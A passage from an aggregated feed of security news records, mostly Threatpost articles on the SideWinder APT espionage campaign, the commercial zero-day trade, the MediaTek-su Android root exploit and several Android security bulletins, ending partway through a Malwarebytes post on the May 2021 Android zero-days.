\u201cmail[.]nepal[.]gov[.]np\u201d.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/09142809/Nepali-phishing-page-300x188.png)\n\nConvincing-looking phishing page. Source: Trend Micro.\n\nInterestingly, after credentials are siphoned off and the users \u201clog in,\u201d they are either sent to the legitimate login pages; or, they are redirected to different documents or news pages, related either to COVID-19 or political fodder.\n\nResearchers said some of the pages include a May article entitled \u201cIndia Should Realise China Has Nothing to Do With Nepal\u2019s Stand on Lipulekh\u201d and a document called \u201cAmbassador Yanchi Conversation with Nepali_Media.pdf,\u201d which provides an interview with China\u2019s ambassador to Nepal regarding Covid-19, the Belt and Road Initiative, and territorial issues in the Humla district.\n\n## **Espionage Effort**\n\nThe campaign also includes a malware element, with malicious documents delivered via email that are bent on installing a cyberespionage-aimed backdoor. And, there was evidence that the group is planning a mobile launch to compromise wireless devices.\n\n\u201cWe identified a server used to deliver a malicious .lnk file and host multiple credential-phishing pages,\u201d wrote researchers, in a [Wednesday posting](<https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html>). \u201cWe also found multiple Android APK files on their phishing server. While some of them are benign, we also discovered malicious files created with Metasploit.\u201d\n\n## **Email Infection Routine**\n\nOn the email front, researchers found that many malicious initial files are being used in the campaign, including a .lnk file that in turn downloads an .rtf file and drops a JavaScript file on the target\u2019s computer; and a .zip file containing a .lnk file that in turn downloads an .hta file (with JavaScript).\n\n\u201cAll of these cases end up with either the downloading or dropping of files and then the execution of JavaScript code, which is a dropper used to install the main backdoor plus stealer,\u201d researchers explained.\n\nThe downloaded .rtf files in the chain meanwhile exploit the CVE-2017-11882 vulnerability; the exploit allows attackers to automatically run malicious code without requiring user interaction.\n\nThe flaw affects all unpatched versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000. While it was patched in November 2017, Microsoft [warned as late as last year](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/#:~:text=Microsoft%20is%20warning%20of%20a,code%20without%20requiring%20user%20interaction.>) that email campaigns were spreading malicious .rtf files boobytrapped with an exploit for it.\n\n\u201cThe CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks,\u201d Microsoft Security Intelligence tweeted in 2019. \u201cNotably, we saw increased activity in the past few weeks. We strongly recommend applying security updates.\u201d\n\nIn this case, the boobytrapped .rtf drops a file named 1.a, which is a JavaScript code snippet. This places the backdoor and stealer into a folder in ProgramData and directly executes it, or creates a scheduled task to execute the dropped files at a later time, Trend Micro found.\n\n\u201cThe content of the newly created folder contains a few files, including Rekeywiz, which is a legitimate Windows application,\u201d analysts explained. \u201cThis application loads various system DLL libraries, including\u2026a fake DUser.dll [that] decrypts the main backdoor + stealer from the .tmp file in the same directory.\u201d\n\nAfter decryption, the payload collects system information and uploads it to the command-and-control server (C2), before setting about stealing targeted file types.\n\n\u201c[This] includes information such as privileges, user accounts, computer system information, antivirus programs, running processes, processor information, operating system information, time zone, installed Windows updates, network information, list of directories in Users\\%USERNAME%\\Desktop, Users\\%USERNAME%\\Downloads, Users\\%USERNAME%\\Documents, Users\\%USERNAME%\\Contacts, as well as information on all drives and installed apps,\u201d Trend Micro said.\n\n## **Mobile Campaign Pending?**\n\nThe researchers saw several mobile apps that were under development. Some contained no malicious code (yet); for instance, a mobile app called \u201cOpinionPoll\u201d was lurking on the server, purporting to be a survey app for gathering opinions regarding the Nepal-India political map dispute.\n\nOthers contained malicious capabilities but seemed unfinished.\n\n![Several mobile apps appear to be under development. Source: Trend Micro.](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/09142909/nepal-phishing-app-300x252.png)\n\nSeveral mobile apps appear to be under development. Source: Trend Micro.\n\n\u201cWhile we were unable to retrieve the payload, according to the Manifest that requests numerous privacy-related permissions like location, contacts, call logs, etc., we can infer that it goes after the user\u2019s private data,\u201d researchers wrote.\n\nSideWinder has used malicious apps as part of its operation before, disguised as photography and file manager tools to lure users into downloading them. Once downloaded into the user\u2019s mobile device, they exploited the CVE-2019-2215 and [MediaTek-SU vulnerabilities](<https://threatpost.com/mediatek-bug-actively-exploited-android/153408/>) for root privileges.\n\nIn this case, \u201cwe believe these applications are still under development and will likely be used to compromise mobile devices in the future,\u201d researchers noted.\n\nSideWinder has active throughout late 2019 and in 2020, according to the firm, having been spotted using the Binder exploit to attack mobile devices. Trend Micro said the group also launched attacks earlier this year against Bangladesh, China and Pakistan, using lure files related to COVID-19.\n\n\u201cAs seen with their phishing attacks and their mobile device tools\u2019 continuous development, SideWinder is very proactive in using trending topics like COVID-19 or various political issues as a social-engineering technique to compromise their targets,\u201d the firm concluded. \u201cTherefore, we recommend that users and organizations be vigilant.\u201d\n\n**_Put Ransomware on the Run: Save your spot for \u201cWhat\u2019s Next for Ransomware,\u201d a _**[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ on Dec. 16 at 2 p.m. ET. Find out what\u2019s coming in the ransomware world and how to fight back. _**\n\n**_Get the latest from John (Austin) Merritt, Cyber Threat Intelligence Analyst at Digital Shadows; Limor Kessem, Executive Security Advisor, IBM Security; and Israel Barak, CISO at Cybereason, on new kinds of attacks. Topics will include the most dangerous ransomware threat actors, their evolving TTPs and what your organization needs to do to get ahead of the next, inevitable ransomware attack. _**[**_Register here_**](<https://threatpost.com/webinars/whats-next-for-ransomware/?utm_source=ART&utm_medium=ART&utm_campaign=Dec_webinar>)**_ for the Wed., Dec. 16 for this LIVE webinar._**\n", "cvss3": {}, "published": "2020-12-09T19:53:13", "type": "threatpost", "title": "SideWinder APT Targets Nepal, Afghanistan in Wide-Ranging Spy Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2019-2215"], "modified": "2020-12-09T19:53:13", "id": "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "href": "https://threatpost.com/sidewinder-apt-nepal-afghanistan-spy-campaign/162086/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T13:20:54", "description": "There were more zero-days exploited in 2019 than any of the previous three years, according to telemetry from FireEye Mandiant. The firm said that\u2019s likely due to more zero-days coming up for sale by cyber-weapons dealers like NSO Group; a growing commercial market has made such tools much more widely available.\n\nWhile the identification and exploitation of zero-day vulnerabilities has historically been a calling card for only the most sophisticated cybercriminals, a wider range of threat actors are now gaining access to exploits for undocumented, unpatched bugs simply by buying them \u2013 no deep security expertise required.\n\n\u201cA wider range of tracked actors appear to have gained access to these capabilities,\u201d FireEye researchers noted [in a blog post](<https://www.fireeye.com/blog/threat-research/2020/04/zero-day-exploitation-demonstrates-access-to-money-not-skill.html>), published on Monday. \u201c[This includes] a significant increase over time in the number of zero-days leveraged by groups suspected to be customers of companies that supply offensive cyber-capabilities.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nOne of the zero-day purveyors that may have done a brisk trade in 2019 was the controversial Israeli firm known as NSO Group. The [private company ](<https://threatpost.com/tag/nso-group/>)has been criticized in the past for selling zero-day exploits to \u201cauthorized governments\u201d who may have launched targeted attacks against[ human rights activists and journalists](<https://threatpost.com/amnesty-international-targeted-by-nation-state-spyware/134630/>). That\u2019s a [charge it denies](<https://threatpost.com/nso-group-president-defends-controversial-tactics/150694/>), arguing that it can be a force for good.\n\nIn its analysis, FireEye pointed out that the FruityArmor APT (a.k.a. Stealth Falcon) continued to attack journalists and activists in the Middle East with targeted espionage campaigns [over the course of the year](<https://threatpost.com/sandcat-fruityarmor-exploiting-microsoft-win32k/142751/>); and from 2016 to 2019, this group used more zero-days than any other, according to FireEye\u2019s analysis. The security firm also said that the APT has been known to buy zero-days from NSO Group, including three iOS zero-days in 2016 reported by Lookout.\n\nAlso, the SandCat APT, which Kaspersky has said is likely affiliated with Uzbekistan state intelligence, was observed using a Windows kernel bug zero-day ([CVE-2019-0859](<https://threatpost.com/windows-zero-day-active-exploits/143820/>)) that opened the door for full system takeover of victims.\n\n\u201cThis group may [also] have acquired their zero-days by purchasing malware from private companies such as NSO Group, as the zero-days used in SandCat operations were also used in Stealth Falcon operations, and it is unlikely that these distinct activity sets independently discovered the same\u2026zero-days,\u201d FireEye noted. SandCat and FruityArmor have been seen using the same exploits [at other points in 2019](<https://threatpost.com/sandcat-fruityarmor-exploiting-microsoft-win32k/142751/>) as well.\n\nAside from involvement with nation-state-backed groups, 2019 also saw a zero-day exploit in WhatsApp ([CVE-2019-3568](<https://threatpost.com/whatsapp-zero-day-exploited-in-targeted-spyware-attacks/144696/>)) reportedly used to distribute spyware developed by NSO Group; and, an Android zero-day vulnerability ([CVE-2019-2215](<https://threatpost.com/google-october-android-security-update/148964/>)) also was seen by Google researchers being exploited in the wild in October. Project Zero member Maddie Stone [wrote in a technical post](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1942>) at the time that there are indicators that the exploit is \u201callegedly being used or sold by the NSO Group.\u201d\n\nAnd finally, financially motivated groups have been seen potentially leveraging purchased zero-days in their operations.\n\n\u201cIn May 2019, we reported that FIN6 used a Windows server 2019 use-after-free zero-day ([CVE-2019-0859](<https://threatpost.com/microsoft-actively-exploited-zero-day-bug/150992/>)) in a targeted intrusion in February 2019,\u201d according to the analysis. It added that reports at the time noted that the group potentially acquired the zero-day from a criminal underground actor known as \u201cBuggiCorp.\u201d However, \u201cwe have not identified direct evidence linking this actor to this exploit\u2019s development or sale,\u201d according to FireEye.\n\n\u201cWe surmise that access to zero-day capabilities is becoming increasingly commodified based on the proportion of zero-days exploited in the wild by suspected customers of private companies,\u201d FireEye concluded. \u201cPrivate companies are likely creating and supplying a larger proportion of zero-days than they have in the past, resulting in a concentration of zero-day capabilities among highly resourced groups.\u201d\n\nAdam Bauer, senior staff security intelligence engineer at Lookout, told Threatpost that his firm has seen the same trend line.\n\n\u201cIn 2019, Lookout researchers were able to obtain leaked conversations between a government group tasked with building surveillance capabilities and a number of private-sector vendors selling zero-day exploits for both mobile devices and desktop computers,\u201d he said. \u201cThese conversations confirmed that zero-day exploits were readily available for purchase.\u201d\n\nHe added, \u201cthere is an important distinction here, which is that the ability to discover a zero-day still requires a highly-skilled adversary, but the ability to exploit that zero-day is definitely available to the highest bidder.\u201d\n\nChris Morales, head of security analytics at Vectra, said that the advancement of development tools could also be fueling the phenomenon.\n\n\u201cThe FireEye advisory mentions that private companies are likely creating and supplying a larger proportion of zero-days than they have in the past,\u201d he told Threatpost. \u201cI wonder how much the current increase in available zero-day is related to the use of machine learning for automated fuzzing? Fuzzing is really hard to do with a high cost of overhead of time and skill. That is why historically attackers have reverted to the simple easy stuff which usually works. Zero-days had a high cost and therefore high value.\u201d\n\nHowever, automated and intelligent fuzzing combined with the fast turnaround of developing exploits for newly discovered vulnerabilities could change the game, he added.\n\n\u201cThe outcome would be a lowering of the cost of zero-days, making them more likely to be used more frequently,\u201d he said. \u201cIs that what we are seeing here? Scale of economy? We knew it was always coming. Looks like it might be here.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/24173101/DUO_320x50.jpg)](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-06T21:05:06", "type": "threatpost", "title": "A Brisk Private Trade in Zero-Days Widens Their Use", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0859", "CVE-2019-2215", "CVE-2019-3568"], "modified": "2020-04-06T21:05:06", "id": "THREATPOST:567B75FB2DD20E431D44DCB39A708BD2", "href": "https://threatpost.com/brisk-private-trade-zero-days/154502/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:23:26", "description": "Google has addressed a high-severity flaw in MediaTek\u2019s Command Queue driver that developers said affects millions of devices \u2013 and which has an exploit already circulating in the wild.\n\nAlso in its March 2020 Android Security bulletin, [issued this week](<https://source.android.com/security/bulletin/2020-03-01>), Google disclosed and patched a critical security vulnerability in the Android media framework, which could enable remote code execution within the context of a privileged process.\n\nThe critical bug (CVE-2020-0032) can be exploited with a specially crafted file, according to the advisory. Other details were scant, but Google noted that it\u2019s the most concerning vulnerability out of the entirety of the March update.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe MediaTek bug meanwhile is an elevation-of-privilege flaw (CVE-2020-0069) discovered by members of XDA-Developers (a forum for Android software modifications) \u2014 they said the bug is more specifically a root-access issue. Even though the March update is the bug\u2019s first public disclosure, XDA members said [in a posting this week](<https://www.xda-developers.com/mediatek-su-rootkit-exploit/>) that an exploit for it has been floating around since April last year. And, they said that it is now being actively used by cybercriminals in campaigns.\n\n\u201cDespite MediaTek making a patch available a month after discovery, the vulnerability is still exploitable on dozens of device models,\u201d according to the alert. \u201cNow MediaTek has turned to Google to close this patch gap and secure millions of devices against this critical security exploit.\u201d\n\nAn XDA community member who goes by \u201cdiplomatic\u201d was looking to gain root access to Amazon Fire tablets, which runs on the Android OS, in order to get rid of what developers said is \u201cuninstallable bloatware\u201d on the devices. Amazon has locked the environment down to keep users within its walled garden, according to the developers.\n\n\u201cThe only way to root an Amazon Fire tablet (without hardware modifications) is to find an exploit in the software that allows the user to bypass Android\u2019s security model,\u201d according to the post. \u201cIn February of 2019, that\u2019s exactly what XDA Senior Member diplomatic did when he published a thread on our Amazon Fire tablet forums. He quickly realized that this exploit was far wider in scope than just Amazon\u2019s Fire tablets.\u201d\n\nIn fact, the exploit works on \u201cvirtually all of MediaTek\u2019s 64-bit chips,\u201d developers said, translating to millions of devices.\n\ndiplomatic\u2019s exploit is a script, dubbed \u201cMediaTek-su\u201d that grants users superuser access in shell. It also sets SELinux (the Linux kernel module that provides access control for processes), to the \u201chighly insecure \u201cpermissive\u201d state,\u201d according to the post.\n\n\u201cFor a user to get root access and set SELinux to permissive on their own device is shockingly easy to do: All you have to do is copy the script to a temporary folder, change directories to where the script is stored, add executable permissions to the script, and then execute the script,\u201d XDA members explained.\n\nAfter discovering the script and how dangerous it can be in February, the forum notified Google of the bug, members said. XDA noted that in January, Trend Micro [found three malicious spyware apps](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>) in the Google Play Store, linked to the APT known as SideWinder. The analysis mentions in passing that the apps were using MediaTek-su to gain root access on Pixel devices \u2013 though XDA pointed out that researchers there likely didn\u2019t realize that MediaTek-su was an unpatched exploit and didn\u2019t think to notify vendors.\n\nThe consequences of a successful attack can be significant: With root access, any app can grant itself any permission it wants; and with a root shell, all files on the device, even those stored in private data directories of applications, are accessible.\n\n\u201cAn app with root can also silently install any other app it wants in the background and then grant them whatever permissions they need to violate your privacy,\u201d according to XDA members. \u201cAccording to XDA Recognized Developer topjohnwu, a malicious app can even \u2018inject code directly into Zygote by using ptrace,\u2019 which means a normal app on your device could be hijacked to do the bidding of the attacker.\u201d\n\nAlso in its March Android update, Google also patched a slew of other high-severity bugs and a handful of moderate flaws, across various components. In the media framework, Google addressed a high-severity elevation-of-privilege bug (CVE-2020-0033) and a high-severity information-disclosure issue (CVE-2020-0034) for instance. Other components with patches include the Android system, the Android framework, the Google Play system, the kernel and flexible printed circuits (FPC). It also issued advisories for high-severity bugs in third-party components, including from Qualcomm and the aforementioned MediaTek bug.\n\nAndroid partners and OEMs were notified of the issues at least a month before publication of the March update in order to give them time to issue patches, as [Samsung has done](<https://security.samsungmobile.com/securityUpdate.smsb>) as well as [Qualcomm](<https://www.qualcomm.com/company/product-security/bulletins/march-2020-bulletin>). Source code patches for the issues were also released to the Android Open Source Project (AOSP) repository, according to the advisory.While the patch is now available, XDA members pointed out that MediaTek chipsets are found in dozens of budget and mid-tier Android devices from many different vendors, so the patching process is likely to take a while.\n", "cvss3": {}, "published": "2020-03-03T19:02:22", "type": "threatpost", "title": "MediaTek Bug Actively Exploited, Affects Millions of Android Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-0032", "CVE-2020-0033", "CVE-2020-0034", "CVE-2020-0069", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-03T19:02:22", "id": "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "href": "https://threatpost.com/mediatek-bug-actively-exploited-android/153408/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-15T22:21:13", "description": "UPDATE\n\nGoogle has released fixes for three critical-severity vulnerabilities in the Media framework of its Android operating system, which if exploited could allow a remote attacker to execute code.\n\nThe remote code execution (RCE) flaws are part of Google\u2019s October 2019 Android Security Bulletin, which deployed fixes for high and critical-severity vulnerabilities tied to nine CVEs overall. Qualcomm, whose chips are used in Android devices, also patched 18 high and critical-severity vulnerabilities.\n\nThe three critical flaws (CVE-2019-2184, CVE-2019-2185, CVE-2019-2186) exist in Android\u2019s Media framework. This framework includes support for playing a variety of common media types, so that users can easily utilize audio, video and images. Android operating systems 7.1.1, 7.1.2, 8.0, 8.1, 9 are specifically impacted by the critical flaws.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>) \n\u201cThe most severe of these issues is a critical security vulnerability in the Media framework component that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,\u201d said Google in a [Monday post](<https://source.android.com/security/bulletin/2019-10-01>). \u201cWe have had no reports of active customer exploitation or abuse of these newly reported issues.\u201d\n\nAlso fixed was a high-severity elevation-of-privilege flaw (CVE-2019-2173) in the Android framework, which \u201ccould enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.\u201d And, two high-severity flaws (CVE-2019-2114, CVE-2019-2187) were discovered in the Android operating system that could \u201ccould enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions.\u201d\n\nEighteen CVEs \u2013 including eight critical ones \u2013 were also patched, related to Qualcomm closed-source components, which are used in Android devices. The [critical severity flaws](<https://www.qualcomm.com/company/product-security/bulletins/october-2019-bulletin>) exist across various Qualcomm technologies, including its kernel (CVE-2018-13916), multi-mode call processor (CVE-2019-2271), boot technology (CVE-2019-2251) and more.\n\n## Manufacturer Updates\n\nManufacturers of Android devices typically push out their own patches to address updates in tandem with or after the Google Security Bulletin.\n\nSamsung said in a [security maintenance release](<https://security.samsungmobile.com/securityUpdate.smsb>) that it is releasing several of the Android security bulletin patches, including those addressing critical flaws CVE-2019-2284, CVE-2019-2285 and CVE-2019-2186, to major Samsung models. Meanwhile LG also [rolled out patches](<https://lgsecurity.lge.com/security_updates_mobile.html>) covered by the October security bulletin (also addressing CVE-2019-2184, CVE-2019-2185 and CVE-2019-2186). [Pixel devices](<https://source.android.com/security/bulletin/pixel/2019-10-01>), which run on Google\u2019s Android operating system, received patches as part of Google\u2019s October security update as well.\n\nThreatpost has reached out to Nokia regarding any patches it plans to apply to its phones.\n\n## Google Zero Day Patch Rollout\n\nWhile initially there was no sign of a recently revealed Android zero-day vulnerability \u2014 disclosed this week and actively being exploited in the wild \u2014 on Google\u2019s official Android Security Bulletin, the bulletin was later updated to include a patch for the flaw. The [zero-day flaw](<https://threatpost.com/google-warns-of-zero-day/148924/>) gives an attacker full control over 18 phone models including its flagship Pixel handset and devices made by Samsung, Huawei and Xiaomi.\n\nThe bug ([CVE-2019-2215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215>)) was also mentioned in the Pixel update bulletin, which said \u201cPixel 1 and Pixel 2 devices will receive the patch for CVE-2019-2215 as part of the October update.\u201d\n\n_This article was updated on Oct. 8 at 1 pm ET to reflect that the Android security bulletin was updated to include CVE-2019-2215._\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree & Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-08T16:20:43", "type": "threatpost", "title": "Google October Android Security Update Fixes Critical RCE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13916", "CVE-2019-2114", "CVE-2019-2173", "CVE-2019-2184", "CVE-2019-2185", "CVE-2019-2186", "CVE-2019-2187", "CVE-2019-2215", "CVE-2019-2251", "CVE-2019-2271", "CVE-2019-2284", "CVE-2019-2285", "CVE-2020-4703", "CVE-2020-4711"], "modified": "2019-10-08T16:20:43", "id": "THREATPOST:B5FB954E071EBB6310CA545E6D56450B", "href": "https://threatpost.com/google-october-android-security-update/148964/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T21:52:10", "description": "Google has fixed two critical bugs affecting its Android handsets. The more serious flaws exists in the Android System component and allow remote attackers to execute arbitrary code.\n\nThe two critical vulnerabilities are part of Google\u2019s [January Android security bulletin](<https://source.android.com/security/bulletin/2021-01-01>), released Monday. The security update addressed 43 bugs overall for the Android operating systems. As part of this, Qualcomm, whose chips are used in Android devices, patched a mix of high- and critical-severity vulnerabilities tied to 15 bugs.\n\nThe critical-severity flaws include a remote-code-execution flaw in Google\u2019s Android System component (CVE-2021-0316), the core of the Android operating system.\n\n[![2020 Reader Survey: Share Your Feedback to Help Us Improve](https://media.threatpost.com/wp-content/uploads/sites/103/2020/12/18164737/Reader-Survey-Update.jpg)](<https://threatpost.com/2020-reader-survey/161168/>)\n\nAnother flaw, rated serious, is a denial-of-service issue (CVE-2021-0313) in the Android Framework component, which is a set of APIs (consisting of system tools and user interface design tools) that allow developers to quickly and easily write apps for Android phones.\n\n\u201cThe most severe of these issues is a critical security vulnerability in the System component that could enable a remote attacker using a specially crafted transmission to execute arbitrary code within the context of a privileged process,\u201d according to Google. Both critical flaws are fixed in Android versions 8.0, 8.1, 9, 10 and 11.\n\nBeyond these critical-severity issues, Google fixed a tangle of 13 high-severity flaws in its Framework. This included eight elevation-of-privilege issues (CVE-2021-0303, CVE-2021-0306, CVE-2021-0307, CVE-2021-0310, CVE-2021-0315, CVE-2021-0317, CVE-2021-0318, CVE-2021-0319); four information disclosure glitches (CVE-2021-0304, CVE-2021-0309, CVE-2021-0321, CVE-2021-0322) and one DoS flaw (CVE-2019-9376).\n\nThree high-severity bugs were found in Media Framework (which offers support for playing a variety of common media types, so users can easily utilize audio, video and images). These include a RCE flaw tied to CVE-2016-6328, and two information disclosure flaws tied to CVE-2021-0311 and CVE-2021-0312.\n\nGoogle also rolled out patches for flaws in various third-party components in its Android ecosystem. This included three high-severity flaws in the kernel (CVE-2020-10732, CVE-2020-10766, CVE-2021-0323), which could enable a local malicious application to bypass operating system protections that isolate application data from other applications. A high-severity vulnerability (CVE-2021-0301) was also fixed in the MediaTek component.\n\nFinally, 15 critical and high-severity flaws were addressed in Qualcomm components, including ones affecting the kernel (CVE-2020-11233), display (CVE-2020-11239, CVE-2020-11261, CVE-2020-11262), camera (CVE-2020-11240) and audio components (CVE-2020-11250).\n\nThe fixes come after [a hefty December Android security update](<https://threatpost.com/google-patches-critical-wi-fi-and-audio-bugs-in-android-handsets/162060/>), where Google patched ten critical bugs, including one tied to the Android media framework component that could give attacker remote control of vulnerable handsets.\n\n**Supply-Chain Security: A 10-Point Audit Webinar:** Is your company\u2019s software supply-chains prepared for an attack? On Wed., Jan. 20 at 2p.m. ET, start identifying weaknesses in your supply-chain with actionable advice from experts \u2013 part of a [limited-engagement and LIVE Threatpost webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>). CISOs, AppDev and SysAdmin are invited to ask a panel of A-list cybersecurity experts how they can avoid being caught exposed in a post-SolarWinds-hack world. Attendance is limited: **[Register Now](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>)** and reserve a spot for this exclusive Threatpost [Supply-Chain Security webinar](<https://threatpost.com/webinars/supply-chain-security-a-10-point-audit/?utm_source=ART&utm_medium=ART&utm_campaign=Jan_webinar>) \u2013 Jan. 20, 2 p.m. ET.\n", "cvss3": {}, "published": "2021-01-05T20:21:40", "type": "threatpost", "title": "Google Warns of Critical Android Remote Code Execution Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-6328", "CVE-2019-9376", "CVE-2020-10732", "CVE-2020-10766", "CVE-2020-11233", "CVE-2020-11239", "CVE-2020-11240", "CVE-2020-11250", "CVE-2020-11261", "CVE-2020-11262", "CVE-2021-0301", "CVE-2021-0303", "CVE-2021-0304", "CVE-2021-0306", "CVE-2021-0307", "CVE-2021-0309", "CVE-2021-0310", "CVE-2021-0311", "CVE-2021-0312", "CVE-2021-0313", "CVE-2021-0315", "CVE-2021-0316", "CVE-2021-0317", "CVE-2021-0318", "CVE-2021-0319", "CVE-2021-0321", "CVE-2021-0322", "CVE-2021-0323"], "modified": "2021-01-05T20:21:40", "id": "THREATPOST:17E00AD621A0ECD9F90FE97E083BF4AC", "href": "https://threatpost.com/google-warns-of-critical-android-remote-code-execution-bug/162756/", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}], "malwarebytes": [{"lastseen": "2021-05-20T18:28:42", "description": "In the Android Security Bulletin of May 2021, published at the beginning of this month, you can find a list of roughly 40 vulnerabilities in several components that might concern Android users. According to info provided by Google's Project Zero team, four of those Android security vulnerabilities are being exploited in the wild as zero-day bugs.\n\nThe good news is that patches are available. The problem with Android patches and updates though is that you, as a user, are dependent on your upstream provider for when these patches will reach your system.\n\n### Android updates and upgrades\n\nIt is always unclear for Android users when they can expect to get the latest updates and upgrades. An Android device is a computer in many regards and it needs regular refreshes. Either to patch against the latest vulnerabilities or when new features become available.\n\nAn update is when an existing Android version gets improved, and these come out regularly. An upgrade is when your device gets a later Android version. Usually a device can function just fine without getting an upgrade as long as it stays safe by getting the latest updates.\n\n### Depends on brand and type\n\nGoogle is the company that developed the Android operating system (which is itself a type of Linux) and the company also keeps it current. It is also the company that creates the security patches. But then the software is turned over to device manufacturers that create their own versions for their own devices.\n\nSo, when (even if) you will get the latest updates at all, depends on the manufacturer of your device. Some manufacturer\u2019s devices may never see another update because Google is not allowed to do business with them.\n\n### The critical vulnerabilities\n\nIn a note, the bulletin states that there are indications that CVE-2021-1905, CVE-2021-1906, CVE-2021-28663, and CVE-2021-28664 may be under limited, targeted exploitation. Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. The four that may be being abused in the wild are:\n\n * [CVE-2021-1905](<https://nvd.nist.gov/vuln/detail/CVE-2021-1905>) Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables.\n * [CVE-2021-1906](<https://nvd.nist.gov/vuln/detail/CVE-2021-1906>) Improper handling of address de-registration on failure can lead to new GPU address allocation failure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables.\n * [CVE-2021-28663](<https://nvd.nist.gov/vuln/detail/CVE-2021-28663>) The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.\n * [CVE-2021-28664](<https://nvd.nist.gov/vuln/detail/CVE-2021-28664>) The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r8p0 through r30p0.\n\nUse after free (UAF) like CVE-2021-1905 is a vulnerability caused by incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program.\n\nSnapdragon is a suite of system on a chip (SoC) semiconductor products for mobile devices designed and marketed by Qualcomm Technologies Inc.\n\nArm Mali GPU is a graphics processing unit for a range of mobile devices from smartwatches to autonomous vehicles developed by Arm.\n\n### Mitigation\n\nYou can tell whether your device is protected by [checking the security patch level](<https://support.google.com/android/answer/7680439?hl=en>).\n\n * Security patch levels of 2021-05-01 or later address all issues associated with the 2021-05-01 security patch level.\n * Security patch levels of 2021-05-05 or later address all issues associated with the 2021-05-05 security patch level and all previous patch levels.\n\nWe would love to tell you to patch urgently, but as we explained, 